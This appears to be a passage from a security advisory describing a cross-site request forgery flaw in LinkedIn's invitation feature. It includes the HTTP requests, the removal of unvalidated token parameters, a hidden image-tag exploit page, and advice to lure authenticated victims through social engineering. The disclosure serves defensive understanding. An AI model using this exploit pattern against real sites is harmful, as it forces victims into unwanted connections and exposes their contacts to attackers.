Next, we show a typical request to the "Send Invitation" functionality:
POST /fetch/manual-invite-create HTTP/1.1
Host: www.linkedin.com
...
emailAddresses=<email>&subject=Invitation+to+connect+on+LinkedIn&csrfToken=ajax:1234567890123456789&sourceAlias=0_cB6j7zv7bfEcbTWXQyKwqELvCi7FWQRq-jJsq2WDImH
Some parameters are not used/validated by the application, so we can remove these parameters from the request:
- csrfToken
- sourceAlias
Also, We can use HTTP GET method instead the HTTP POST method used at this request. This makes it more easy the exploitation of the CSRF vulnerability. So, finally, this HTTP request provoke the same result that the original HTTP POST request:
GET /fetch/manual-invite-create?emailAddresses=<email>&subject=Invitation+to+connect+on+LinkedIn
1. An attacker create a web page "csrf-exploit.html" that realize a HTTP GET request to the "Send Invitation" functionality.
For example:
...
<img src="http://www.linkedin.com/fetch/manual-invite-create?emailAddresses=<attacker_email>&subject=" width=0 height=0>
...
2. A user authenticated in LinkedIn visit the "csrf-exploit.html" page controlled by the attacker.
For example, the attacker sends a mail to the victim (through the messaging system that provides LinkedIn is better as it ensures that the victim user is authenticated) and provokes that the victim visits his page (using social engineering techniques).
3. The attacker receives an invitation request from the victim user, so the attacker just accept this invitation and the user is added to his connections/contacts.
